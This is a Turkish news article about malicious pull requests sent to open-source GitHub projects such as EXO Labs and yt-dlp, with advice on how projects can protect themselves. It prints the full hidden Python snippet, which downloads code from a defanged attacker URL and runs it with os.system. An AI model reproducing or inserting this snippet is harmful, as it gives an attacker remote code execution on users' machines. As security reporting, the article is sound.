Son günlerde GitHub’daki açık kaynak projelere yönelik zararlı kod ekleme girişimleri dikkat çekiyor. Siber saldırganlar, “pull request” (PR) adı verilen kod değişikliği talepleri ile projelere arka kapılar eklemeye çalışıyor. Bu tür saldırılar, projeyi kullanan herkesin cihazına zararlı yazılım bulaştırabilir.
GitHub’da Tehlikeli Bir PR Girişimi Yaşandı
EXO Labs adlı bir yapay zeka ve makine öğrenimi şirketi, GitHub depolarına gelen zararlı bir PR girişimini tespit etti. Bu “masum görünümlü” değişiklik talebi, Python koduna gizlenmiş bir komut içeriyordu:
python import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
Bu kod, saldırganların belirli bir URL’den zararlı yazılım indirip çalıştırmasına olanak tanıyordu. Eğer bu değişiklik kabul edilseydi, projeyi kullanan herkes risk altında olacaktı. Neyse ki bu PR fark edilip reddedildi.
Bu Saldırıların Arkasında Kim Var?
Saldırıyı yapan kişi ya da kişiler hâlâ belirsiz. Ancak saldırılar sahte GitHub hesapları üzerinden yapılıyor. Örneğin, “evildojo666” adlı hesap, EXO Labs’a bu zararlı PR’yi gönderen kullanıcıydı. Hesap daha sonra silindi.
İlginç olan, saldırganın gerçek bir güvenlik araştırmacısı olan Mike Bell’in adını ve bilgilerini taklit etmesiydi. Bell, bu olaylarla bir bağlantısı olmadığını ve bu saldırıların kendisini karalama amaçlı yapıldığını belirtti.
Diğer Hedefler ve Zararlı Kod Yayılma Girişimleri
EXO Labs dışında, başka popüler açık kaynak projeler de bu saldırıların hedefi oldu. Örneğin:
- yt-dlp gibi çok kullanılan projelere benzer zararlı PR’lar gönderildi.
- Toplamda 18’den fazla zararlı kod değişikliği tespit edildi.
Neyse ki GitHub, bu saldırılarda kullanılan birçok sahte hesabı kapattı. Ayrıca, bazı projeler Presubmit AI Reviewer gibi otomatik kod kontrol araçları sayesinde bu zararlı girişimleri erkenden engelledi.
Açık Kaynak Projeleri Korumak İçin Ne Yapılmalı?
Açık kaynak projelerde güvenliği sağlamak için şu önlemler alınabilir:
- Otomatik Kod Kontrol Araçları Kullanın: Zararlı kodları tespit edebilecek araçlar kullanın.
- PR’ları Dikkatlice İnceleyin: Gelen her kod değişikliğini detaylı bir şekilde kontrol edin.
- Kaynağı Güvenilir Olmayan Hesaplara Dikkat Edin: Bilinmeyen ya da şüpheli hesaplardan gelen değişikliklere karşı tedbirli olun.
GitHub projelerine yönelik bu tür saldırılar, açık kaynak güvenliğinin ne kadar önemli olduğunu bir kez daha gösteriyor. Özellikle projelere katkıda bulunmak isteyen herkesin niyetinin iyi olmayabileceğini unutmamak gerekiyor. Otomatik araçlar bu tür tehlikelerin önüne geçilebilir.